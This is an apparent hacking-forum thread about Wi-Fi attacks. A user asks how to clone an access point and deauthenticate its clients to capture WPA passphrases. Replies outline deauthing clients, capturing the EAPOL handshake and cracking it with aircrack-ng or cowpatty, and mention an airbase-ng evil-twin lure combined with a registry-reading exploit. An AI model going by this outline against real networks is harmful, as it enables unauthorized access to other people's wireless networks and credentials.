Results 1 to 5 of 5

Thread: ap spoof

  1. #1
    7ELEVEN
    Guest

    Default ap spoof

    ok so i was looking at a few other posts that almost came close to wat i wanted to do.

    Instead of cracking a wpa password i wanna


    Use mdk3 to setup a exact clone of my test ap, deauth all clients from the real ap make is so no one can connect back to the real ap...so after awhile there gonna see my clone ap with there ssid and try to connect using the wpa pass-phrase of the original ap. then i collect that in plain text file some-how?


    is this being done already?

    if so can some one give me so examples?

  2. #2
    Member
    Join Date
    Apr 2007
    Posts
    155

    Default

    Silly person, You can do that and have fun with it, but you ARENT going to the a WPA password in plaintext, its sent using the WPA encryption scheme, making all that work to make the targets connect to you, a waste of time when you can get the same data by just disconnecting them and sniffing for a second.
    This is a hackers forum :P
    root ~# aircrack-ng pwnd-01.cap
    Lenovo Thinkpad R500, OS: Ubuntu 8.10, BackTrack3, Windows XP (VirtualBox), Windows Vista, Windows 7 beta

  3. #3
    7ELEVEN
    Guest

    Default ok

    Quote Originally Posted by Shavx View Post
    you can get the same data by just disconnecting them and sniffing for a second.
    so is there away to decode that info to get the pass phrase? is this were the dictionary or rain bow brute force comes in ?

  4. #4

    Default

    Quote Originally Posted by 7ELEVEN View Post
    so is there away to decode that info to get the pass phrase? is this were the dictionary or rain bow brute force comes in ?
    Yes, that is where the dict brute force or cowpatty type hash database comes in. Deauth a connected client, capture the 4 EAPOL packets that are transmitted between the AP and Client when they attempt to reauthenticate and then use something like aircrack-ng or cowpatty to crack the WPA passphrase. The only WPA authentication scheme this won't work against is if the AP/Client are using some kind of 802.1x scheme (also known as WPA Enterprise) such as RADIUS. I'm pretty sure there are a couple threads on this forum about how to do this in detail. Just search for WPA Cracking.

    Good Luck...

  5. #5
    Senior Member
    Join Date
    Apr 2008
    Posts
    2,008

    Default

    Quote Originally Posted by 7ELEVEN View Post
    so is there away to decode that info to get the pass phrase? is this were the dictionary or rain bow brute force comes in ?
    In other words the approach you are describing will not provide you with a shortcut to obtain the WPA passphrase. The handshake is exchanged in 4 steps and without already knowing the passphrase you will not be able to even perform a full authentication, or even less get the passphrase in plain text.

    The alternative method, which actually is possible, that is discussed in the other thread is to use airbase-ng to lure a client to connect to your unencrypted AP instead of his own and then using an exploit obtain the key from his registry
    -Monkeys are like nature's humans.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •